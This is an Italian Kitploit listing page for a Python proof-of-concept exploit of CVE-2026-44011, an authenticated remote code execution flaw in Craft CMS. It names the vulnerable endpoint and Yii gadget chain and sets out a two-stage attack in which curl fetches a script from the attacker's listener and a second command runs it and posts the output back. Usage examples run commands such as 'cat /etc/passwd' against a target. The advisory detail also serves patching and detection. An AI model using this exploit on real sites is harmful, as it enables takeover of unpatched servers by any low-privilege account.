Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-44011-poc — Proof-of-concept di exploit in Python per CVE-2026-44011, un RCE autenticato in Craft CMS tramite Yii behavior injection, con acquisizione dell'output dei comandi in due fasi. | Kitploit
Strumenti/GitHubGitHub/khush-613/cve-2026-44011-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHubkhush-613/cve-2026-44011-poc

CVE-2026-44011-poc

Proof-of-concept di exploit in Python per CVE-2026-44011, un RCE autenticato in Craft CMS tramite Yii behavior injection, con acquisizione dell'output dei comandi in due fasi.

Vedi Repository
162 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-44011

RCE autenticato in Craft CMS tramite iniezione di behavior Yii.

Affected: 4.0.0–4.17.11, 5.0.0–5.9.17
Fixed in: 4.17.12, 5.9.18
Advisory: GHSA-qrgm-p9w5-rrfw

Vulnerabilità

L'endpoint /admin/actions/element-search/search accetta un parametro condition che viene passato direttamente a ElementCondition::createCondition() senza che venga prima chiamato Component::cleanseConfig(). Ciò significa che le chiavi speciali di costruzione di oggetti di Yii — __class, as <name> (attach behavior), on <event> (register handler) — hanno effetto quando l'oggetto FieldLayout viene costruito a partire dai dati della richiesta.

L'exploit allega AttributeTypecastBehavior configurato per chiamare Psy\Readline\Hoa\ConsoleProcessus::execute() (un interno di PSY/Yii che esegue comandi shell) come suo callable di typecast. Il behavior si attiva sull'evento beforeSave, che Craft scatena durante la stessa richiesta.

Qualsiasi account — anche un editor con privilegi minimi — può farlo. Non sono necessari privilegi di amministratore.

Come funziona questo exploit

Anziché una reverse shell cieca, utilizza una cattura dell'output in due fasi:

  1. Fase 1 — inietta un comando curl che recupera uno script shell da un listener HTTP locale sotto il tuo controllo
  2. Fase 2 — inietta un secondo comando che esegue quello script; lo script invia via POST il suo output al tuo listener

Ottieni l'output del comando direttamente nel terminale, senza bisogno di un listener nc.

Requisiti

  • Python 3.8+
  • Libreria requests (pip install requests)
  • Il target deve essere in grado di raggiungere la tua macchina (per il callback)
  • Credenziali valide per qualsiasi account Craft CMS

Utilizzo

# Basic — run id on the target
python3 exploit.py \
  -b http://target.com \
  -u [email protected] \
  -p 'password123' \
  -c 'id'

# Custom control panel path
python3 exploit.py -b http://target.com -P /craftcms -u admin -p pass -c 'whoami'

# Specify your callback address when it can't be inferred
python3 exploit.py -b http://target.com -u admin -p pass -c 'cat /etc/passwd' \
  -H 10.10.14.5 --listen-port 8080

# Skip TLS verification (self-signed certs)
python3 exploit.py -b https://target.com -u admin -p pass -c 'id' --no-verify

# Skip version check (e.g. version detection fails)
python3 exploit.py -b http://target.com -u admin -p pass -c 'id' --force

L'host/porta di callback è dove il target invia via POST l'output verso di te. Per impostazione predefinita l'host viene dedotto dalla tua rotta verso il target e la porta è assegnata dal sistema operativo. Se il target è dietro un NAT o una VPN avrai bisogno di --callback-host che punti al tuo IP raggiungibile.

Opzioni

-b / --base-url       Target origin (required)
-P / --cp-path        Control panel path (default: /admin)
-u / --username       Login name or email (required)
-p / --password       Password (required)
-c / --command        Shell command to execute (required)
-s / --site-id        Craft site ID (default: 1)
-e / --element-type   Element type for the condition (default: craft\elements\Category)
-t / --timeout        Request timeout in seconds (default: 15)
-H / --callback-host  Your reachable address for output callbacks
     --listen-port    Port for output listener (default: OS picks one)
     --no-verify      Skip TLS cert verification
-F / --force          Skip version range check

Testato su

  • Craft CMS 5.9.8, Ubuntu 22.04

Disclaimer

Solo per test di sicurezza autorizzati e ricerca.

Scarica lo strumento